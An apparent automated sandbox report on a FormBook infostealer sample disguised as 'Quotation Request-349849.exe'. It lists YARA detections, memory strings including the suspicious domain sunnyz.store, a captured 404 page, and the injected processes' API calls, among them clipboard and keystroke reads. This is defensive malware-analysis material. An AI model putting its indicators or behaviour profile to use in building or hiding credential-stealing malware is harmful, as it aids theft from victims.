2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 12:08:20 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: LcmEonpIrfS.exe, 00000007.00000002.2561468809.0000000004A6A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sunnyz.store
                Source: LcmEonpIrfS.exe, 00000007.00000002.2561468809.0000000004A6A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sunnyz.store/ead0/
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: comp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: comp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: comp.exe, 00000006.00000002.2558167888.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: comp.exe, 00000006.00000002.2558167888.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: comp.exe, 00000006.00000002.2558167888.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: comp.exe, 00000006.00000003.1916692588.000000000764A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: comp.exe, 00000006.00000002.2561548663.0000000003696000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002B46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00844164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00844164
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00844164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00844164
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00843F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00843F66
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0083001C
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0085CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0085CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2561468809.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2557800051.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2560519490.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2561398327.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736836751.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1736362212.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1737238924.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2559379970.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: This is a third-party compiled AutoIt script.0_2_007D3B3A
                Source: Quotation Request-349849.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Quotation Request-349849.exe, 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_704ae87a-c
                Source: Quotation Request-349849.exe, 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c22c3d9e-9
                Source: Quotation Request-349849.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_95312260-b
                Source: Quotation Request-349849.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_481cf4e5-e
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Quotation Request-349849.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042C643 NtClose,3_2_0042C643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72B60 NtClose,LdrInitializeThunk,3_2_03B72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03B72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03B72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B735C0 NtCreateMutant,LdrInitializeThunk,3_2_03B735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B74340 NtSetContextThread,3_2_03B74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B74650 NtSuspendThread,3_2_03B74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72BA0 NtEnumerateValueKey,3_2_03B72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72B80 NtQueryInformationFile,3_2_03B72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72BF0 NtAllocateVirtualMemory,3_2_03B72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72BE0 NtQueryValueKey,3_2_03B72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72AB0 NtWaitForSingleObject,3_2_03B72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72AF0 NtWriteFile,3_2_03B72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72AD0 NtReadFile,3_2_03B72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72FB0 NtResumeThread,3_2_03B72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72FA0 NtQuerySection,3_2_03B72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F90 NtProtectVirtualMemory,3_2_03B72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72FE0 NtCreateFile,3_2_03B72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F30 NtCreateSection,3_2_03B72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F60 NtCreateProcessEx,3_2_03B72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72EA0 NtAdjustPrivilegesToken,3_2_03B72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72E80 NtReadVirtualMemory,3_2_03B72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72EE0 NtQueueApcThread,3_2_03B72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72E30 NtWriteVirtualMemory,3_2_03B72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72DB0 NtEnumerateKey,3_2_03B72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72DD0 NtDelayExecution,3_2_03B72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D30 NtUnmapViewOfSection,3_2_03B72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D10 NtMapViewOfSection,3_2_03B72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D00 NtSetInformationFile,3_2_03B72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CA0 NtQueryInformationToken,3_2_03B72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CF0 NtOpenProcess,3_2_03B72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CC0 NtQueryVirtualMemory,3_2_03B72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C00 NtQueryInformationProcess,3_2_03B72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C60 NtCreateKey,3_2_03B72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73090 NtSetValueKey,3_2_03B73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73010 NtOpenDirectoryObject,3_2_03B73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B739B0 NtGetContextThread,3_2_03B739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73D10 NtOpenProcessToken,3_2_03B73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73D70 NtOpenThread,3_2_03B73D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A4340 NtSetContextThread,LdrInitializeThunk,6_2_009A4340
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A4650 NtSuspendThread,LdrInitializeThunk,6_2_009A4650
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2AD0 NtReadFile,LdrInitializeThunk,6_2_009A2AD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2AF0 NtWriteFile,LdrInitializeThunk,6_2_009A2AF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_009A2BA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_009A2BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_009A2BE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2B60 NtClose,LdrInitializeThunk,6_2_009A2B60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_009A2CA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_009A2C70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2C60 NtCreateKey,LdrInitializeThunk,6_2_009A2C60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2DD0 NtDelayExecution,LdrInitializeThunk,6_2_009A2DD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_009A2DF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_009A2D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_009A2D30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_009A2E80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_009A2EE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2FB0 NtResumeThread,LdrInitializeThunk,6_2_009A2FB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2FE0 NtCreateFile,LdrInitializeThunk,6_2_009A2FE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2F30 NtCreateSection,LdrInitializeThunk,6_2_009A2F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A35C0 NtCreateMutant,LdrInitializeThunk,6_2_009A35C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A39B0 NtGetContextThread,LdrInitializeThunk,6_2_009A39B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2AB0 NtWaitForSingleObject,6_2_009A2AB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2B80 NtQueryInformationFile,6_2_009A2B80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2CC0 NtQueryVirtualMemory,6_2_009A2CC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2CF0 NtOpenProcess,6_2_009A2CF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2C00 NtQueryInformationProcess,6_2_009A2C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2DB0 NtEnumerateKey,6_2_009A2DB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2D00 NtSetInformationFile,6_2_009A2D00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2EA0 NtAdjustPrivilegesToken,6_2_009A2EA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2E30 NtWriteVirtualMemory,6_2_009A2E30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2F90 NtProtectVirtualMemory,6_2_009A2F90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2FA0 NtQuerySection,6_2_009A2FA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A2F60 NtCreateProcessEx,6_2_009A2F60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3090 NtSetValueKey,6_2_009A3090
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3010 NtOpenDirectoryObject,6_2_009A3010
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3D10 NtOpenProcessToken,6_2_009A3D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_009A3D70 NtOpenThread,6_2_009A3D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00428FF0 NtCreateFile,6_2_00428FF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00429160 NtReadFile,6_2_00429160
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00429250 NtDeleteFile,6_2_00429250
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_004292F0 NtClose,6_2_004292F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 6_2_00429450 NtAllocateVirtualMemory,6_2_00429450
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0083A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0083A1EF
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00828310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00828310
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008351BD
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007DE6A00_2_007DE6A0
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007FD9750_2_007FD975
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007DFCE00_2_007DFCE0
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F21C50_2_007F21C5
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008062D20_2_008062D2
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008503DA0_2_008503DA
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0080242E0_2_0080242E
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F25FA0_2_007F25FA
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0082E6160_2_0082E616
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007E66E10_2_007E66E1
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_0080878F0_2_0080878F
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008388890_2_00838889
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007E88080_2_007E8808
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008068440_2_00806844
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_008508570_2_00850857
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007FCB210_2_007FCB21
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00806DB60_2_00806DB6
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007E6F9E0_2_007E6F9E
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007E30300_2_007E3030
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007FF1D90_2_007FF1D9
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F31870_2_007F3187
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007D12870_2_007D1287
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F14840_2_007F1484
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007E55200_2_007E5520
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F76960_2_007F7696
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007E57600_2_007E5760
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F19780_2_007F1978
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00809AB50_2_00809AB5
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_00857DDB0_2_00857DDB
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007FBDA60_2_007FBDA6
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007F1D900_2_007F1D90
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007DDF000_2_007DDF00
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_007E3FE00_2_007E3FE0
                Source: C:\Users\user\Desktop\Quotation Request-349849.exeCode function: 0_2_015EC8980_2_015EC898
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004185B33_2_004185B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004030D03_2_004030D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004010E03_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E0833_2_0040E083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004100A33_2_004100A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E1C73_2_0040E1C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E1D33_2_0040E1D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004012403_2_00401240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401B473_2_00401B47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401B503_2_00401B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042EC633_2_0042EC63
